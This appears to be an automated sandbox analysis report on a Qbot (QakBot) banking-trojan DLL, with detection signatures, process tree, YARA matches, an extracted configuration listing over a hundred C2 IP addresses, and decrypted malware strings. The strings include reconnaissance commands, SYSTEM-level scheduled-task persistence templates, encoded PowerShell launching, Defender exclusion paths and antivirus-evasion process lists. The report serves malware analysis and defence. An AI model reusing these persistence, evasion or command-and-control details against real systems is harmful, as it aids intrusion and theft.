Edit tour

Windows Analysis Report
F072.dll

Overview

General Information

Sample Name:	F072.dll
Analysis ID:	878698
MD5:	0f25933ea364d051e10480e68cbf4ae7
SHA1:	bcc95a67d10b389e7c58159911ceac3ba92bef0b
SHA256:	f2e4cbb34cd7431ceb5a186fddd3b38736e5e327afff8dff5d87fe4a6a64048f
Tags:	dllqbot
Infos:

Detection

Qbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Qbot

Antivirus / Scanner detection for submitted sample

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Writes to foreign memory regions

Allocates memory in foreign processes

Injects a PE file into a foreign processes

C2 URLs / IPs found in malware configuration

Sample uses string decryption to hide its real strings

Potentially malicious time measurement code found

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

One or more processes crash

May sleep (evasive loops) to hinder dynamic analysis

Found evasive API chain (date check)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Creates a DirectInput object (often for capturing keystrokes)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Connects to several IPs in different countries

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 4332 cmdline: loaddll32.exe "C:\Users\user\Desktop\F072.dll" MD5: 3B4636AE519868037940CA5C4272091B)

conhost.exe (PID: 2528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5268 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\F072.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 5236 cmdline: rundll32.exe "C:\Users\user\Desktop\F072.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 6832 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5236 -s 664 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 5240 cmdline: rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_i MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 6812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 664 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 7020 cmdline: rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_q MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5708 cmdline: rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_stable MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 5696 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5708 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 4732 cmdline: rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_i MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 5704 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4732 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 4708 cmdline: rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_q MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4696 cmdline: rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_stable MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 2872 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 5400 cmdline: rundll32.exe "C:\Users\user\Desktop\F072.dll",next MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

wermgr.exe (PID: 6828 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)

rundll32.exe (PID: 5388 cmdline: rundll32.exe "C:\Users\user\Desktop\F072.dll",mvutil_license MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5636 cmdline: rundll32.exe "C:\Users\user\Desktop\F072.dll",mvutil_configuration MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
QakBot, qbotQbot	QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download.	GOLD CABIN	http://contagiodump.blogspot.com/2010/11/template.html http://www.secureworks.com/research/threat-profiles/gold-lagoon http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7 https://asec.ahnlab.com/en/44662/	https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot

Malware Configuration

Threatname: Qbot

{"Bot id": "BB30", "Campaign": "1685433861", "Version": "404.1320", "C2 list": ["12.172.173.82:50001", "178.175.187.254:443", "65.95.141.84:2222", "205.237.67.69:995", "83.110.223.61:443", "193.253.100.236:2222", "27.0.48.233:443", "102.159.188.125:443", "71.38.155.217:443", "58.186.75.42:443", "76.178.148.107:2222", "70.28.50.223:2087", "114.143.176.236:443", "51.14.29.227:2222", "59.28.84.65:443", "173.88.135.179:443", "103.144.201.56:2078", "96.87.28.170:2222", "105.186.128.181:995", "176.142.207.63:443", "151.62.238.176:443", "12.172.173.82:32101", "122.186.210.254:443", "82.125.44.236:2222", "84.108.200.161:443", "76.16.49.134:443", "70.28.50.223:32100", "12.172.173.82:465", "76.170.252.153:995", "184.182.66.109:443", "78.92.133.215:443", "50.68.204.71:993", "186.75.95.6:443", "113.11.92.30:443", "70.28.50.223:3389", "98.145.23.67:443", "85.57.212.13:3389", "50.68.186.195:443", "47.205.25.170:443", "12.172.173.82:993", "12.172.173.82:22", "69.242.31.249:443", "81.101.185.146:443", "79.168.224.165:2222", "75.143.236.149:443", "14.192.241.76:995", "86.195.14.72:2222", "81.229.117.95:2222", "220.240.164.182:443", "73.29.92.128:443", "12.172.173.82:21", "96.56.197.26:2222", "75.109.111.89:443", "76.86.31.59:443", "201.244.108.183:995", "68.203.69.96:443", "124.122.47.148:443", "122.184.143.86:443", "92.186.69.229:2222", "70.28.50.223:2083", "89.129.109.27:2222", "147.147.30.126:2222", "125.99.76.102:443", "88.126.94.4:50000", "151.65.167.77:443", "86.132.236.117:443", "92.154.17.149:2222", "223.166.13.95:995", "89.36.206.69:995", "96.56.197.26:2083", "78.18.105.11:443", "82.127.153.75:2222", "90.78.147.141:2222", "82.131.141.209:443", "183.87.163.165:443", "92.9.45.20:2222", "80.6.50.34:443", "80.12.88.148:2222", "69.133.162.35:443", "172.115.17.50:443", "95.45.50.93:2222", "12.172.173.82:2087", "103.140.174.20:2222", "24.198.114.130:995", "50.68.204.71:443", "69.119.123.159:2222", "64.121.161.102:443", "2.82.8.80:443", "184.181.75.148:443", "70.112.206.5:443", "198.2.51.242:993", "2.36.64.159:2078", "79.77.142.22:2222", "84.215.202.8:443", "147.219.4.194:443", "116.74.164.81:443", "70.28.50.223:2078", "12.172.173.82:995", "77.86.98.236:443", "104.35.24.154:443", "213.64.33.61:2222", "47.149.134.231:443", "72.134.124.16:443", "47.34.30.133:443", "103.42.86.42:995", "174.4.89.3:443", "161.142.103.187:995", "78.160.146.127:443", "84.35.26.14:995", "12.172.173.82:20", "70.28.50.223:2078", "124.149.143.189:2222", "70.160.67.203:443", "186.64.67.30:443", "103.123.223.133:443", "188.28.19.84:443", "174.58.146.57:443", "94.207.104.225:443", "86.97.55.89:2222", "69.123.4.221:2222"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000011.00000002.418718397.0000000004980000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000011.00000002.418554458.0000000002C3A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
decrypted.memstr	JoeSecurity_Qbot	Yara detected Qbot	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
17.2.rundll32.exe.4940000.1.unpack	MAL_QakBot_ConfigExtraction_Feb23	QakBot Config Extraction	kevoreilly	0xeb71:$params: 8B 7D 08 8B F1 57 89 55 FC E8 A0 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9 0xa797:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
17.2.rundll32.exe.4940000.1.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
17.2.rundll32.exe.2c51168.0.unpack	MAL_QakBot_ConfigExtraction_Feb23	QakBot Config Extraction	kevoreilly	0xdf71:$params: 8B 7D 08 8B F1 57 89 55 FC E8 A0 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9 0x9b97:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
17.2.rundll32.exe.2c51168.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
17.2.rundll32.exe.2c51168.0.raw.unpack	MAL_QakBot_ConfigExtraction_Feb23	QakBot Config Extraction	kevoreilly	0xeb71:$params: 8B 7D 08 8B F1 57 89 55 FC E8 A0 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9 0xa797:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
17.2.rundll32.exe.2c51168.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
Click to see the 1 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000011.00000002.418554458.0000000002C3A000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Qbot {"Bot id": "BB30", "Campaign": "1685433861", "Version": "404.1320", "C2 list": ["12.172.173.82:50001", "178.175.187.254:443", "65.95.141.84:2222", "205.237.67.69:995", "83.110.223.61:443", "193.253.100.236:2222", "27.0.48.233:443", "102.159.188.125:443", "71.38.155.217:443", "58.186.75.42:443", "76.178.148.107:2222", "70.28.50.223:2087", "114.143.176.236:443", "51.14.29.227:2222", "59.28.84.65:443", "173.88.135.179:443", "103.144.201.56:2078", "96.87.28.170:2222", "105.186.128.181:995", "176.142.207.63:443", "151.62.238.176:443", "12.172.173.82:32101", "122.186.210.254:443", "82.125.44.236:2222", "84.108.200.161:443", "76.16.49.134:443", "70.28.50.223:32100", "12.172.173.82:465", "76.170.252.153:995", "184.182.66.109:443", "78.92.133.215:443", "50.68.204.71:993", "186.75.95.6:443", "113.11.92.30:443", "70.28.50.223:3389", "98.145.23.67:443", "85.57.212.13:3389", "50.68.186.195:443", "47.205.25.170:443", "12.172.173.82:993", "12.172.173.82:22", "69.242.31.249:443", "81.101.185.146:443", "79.168.224.165:2222", "75.143.236.149:443", "14.192.241.76:995", "86.195.14.72:2222", "81.229.117.95:2222", "220.240.164.182:443", "73.29.92.128:443", "12.172.173.82:21", "96.56.197.26:2222", "75.109.111.89:443", "76.86.31.59:443", "201.244.108.183:995", "68.203.69.96:443", "124.122.47.148:443", "122.184.143.86:443", "92.186.69.229:2222", "70.28.50.223:2083", "89.129.109.27:2222", "147.147.30.126:2222", "125.99.76.102:443", "88.126.94.4:50000", "151.65.167.77:443", "86.132.236.117:443", "92.154.17.149:2222", "223.166.13.95:995", "89.36.206.69:995", "96.56.197.26:2083", "78.18.105.11:443", "82.127.153.75:2222", "90.78.147.141:2222", "82.131.141.209:443", "183.87.163.165:443", "92.9.45.20:2222", "80.6.50.34:443", "80.12.88.148:2222", "69.133.162.35:443", "172.115.17.50:443", "95.45.50.93:2222", "12.172.173.82:2087", "103.140.174.20:2222", "24.198.114.130:995", "50.68.204.71:443", "69.119.123.159:2222", "64.121.161.102:443", "2.82.8.80:443", "184.181.75.148:443", "70.112.206.5:443", "198.2.51.242:993", "2.36.64.159:2078", "79.77.142.22:2222", "84.215.202.8:443", "147.219.4.194:443", "116.74.164.81:443", "70.28.50.223:2078", "12.172.173.82:995", "77.86.98.236:443", "104.35.24.154:443", "213.64.33.61:2222", "47.149.134.231:443", "72.134.124.16:443", "47.34.30.133:443", "103.42.86.42:995", "174.4.89.3:443", "161.142.103.187:995", "78.160.146.127:443", "84.35.26.14:995", "12.172.173.82:20", "70.28.50.223:2078", "124.149.143.189:2222", "70.160.67.203:443", "186.64.67.30:443", "103.123.223.133:443", "188.28.19.84:443", "174.58.146.57:443", "94.207.104.225:443", "86.97.55.89:2222", "69.123.4.221:2222"]}

Antivirus / Scanner detection for submitted sample

Source: F072.dll

Avira: detected

Sample uses string decryption to hide its real strings

Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: error res='%s' err=%d len=%u
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: netstat -nao
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: runas
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: ipconfig /all
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: net localgroup
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: nltest /domain_trusts /all_trusts
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Microsoft
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SELF_TEST_1
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: p%08x
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Self test FAILED!!!
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Self test OK.
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: /t5
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: whoami /all
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: cmd
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: microsoft.com,google.com,cisco.com,oracle.com,verisign.com,broadcom.com,yahoo.com,xfinity.com,irs.gov,linkedin.com
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: ERROR: GetModuleFileNameW() failed with error: ERROR_INSUFFICIENT_BUFFER
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: route print
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: .lnk
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: "%s\system32\schtasks.exe" /Create /ST %02u:%02u /RU "NT AUTHORITY\SYSTEM" /SC ONCE /tr "%s" /Z /ET %02u:%02u /tn %s
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: arp -a
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %s "$%s = \"%s\"; & $%s"
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: net share
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: cmd.exe /c set
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Self check
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %u;%u;%u;
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: /c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: ProfileImagePath
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: at.exe %u:%u "%s" /I
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: ProgramData
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Self check ok!
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: powershell.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: qwinsta
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: net view
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%s
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Component_08
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Start screenshot
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: schtasks.exe /Delete /F /TN %u
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: appidapi.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %s \"$%s = \\\"%s\\\\; & $%s\"
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: c:\ProgramData
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Component_07
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: bUdiuy81gYguty@4frdRdpfko(eKmudeuMncueaN
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: powershell.exe -encodedCommand %S
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: ERROR: GetModuleFileNameW() failed with error: %u
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: powershell.exe -encodedCommand
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SoNuce]ugdiB3c[doMuce2s81*uXmcvP
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: \System32\WindowsPowerShell\v1.0\powershell.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /SC ONSTART /TN %u /TR "%s" /NP /F
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: error res='%s' err=%d len=%u
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: netstat -nao
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: runas
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: ipconfig /all
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %u.%u.%u.%u.%u.%u.%04x
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SystemRoot
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: cscript.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: MBAMService.exe;mbamgui.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\xwizard.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\wermgr.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: C:\INTERNAL\__empty
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: .dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Win32_PhysicalMemory
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: ALLUSERSPROFILE
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: image/jpeg
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: LocalLow
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: displayName
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: shlwapi.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\WerFault.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: CommandLine
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: kernel32.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SubmitSamplesConsent
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: 1234567890
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: wbj.go
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\wextract.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Win32_DiskDrive
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: vkise.exe;isesrv.exe;cmdagent.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: System32
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Name
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\WerFault.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: WRSA.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: c:\\
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SpyNetReporting
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: FALSE
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: aswhookx.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Packages
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SonicWallClientProtectionService.exe;SWDash.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: application/x-shockwave-flash
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: RepUx.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\mspaint.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Winsta0
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\wermgr.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: avp.exe;kavtray.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: root\SecurityCenter2
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: MsMpEng.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: userenv.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: csc_ui.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: \\.\pipe\
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: pstorec.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: NTUSER.DAT
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: from
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\sethc.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: netapi32.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\Utilman.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: gdi32.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: setupapi.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SELECT * FROM Win32_Processor
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: iphlpapi.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Caption
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: CrAmTray.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Win32_ComputerSystem
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: user32.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: xagtnotif.exe;AppUIMonitor.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\dxdiag.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: \sf2.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\grpconv.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: egui.exe;ekrn.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Software\Microsoft
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %S.%06d
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: bcrypt.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SELECT * FROM AntiVirusProduct
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\SndVol.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\explorer.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\Utilman.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: wtsapi32.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\xwizard.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: shell32.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: TRUE
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Win32_Bios
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SELECT * FROM Win32_OperatingSystem
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\mobsync.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: c:\hiberfil.sysss
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: /
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: ByteFence.exe
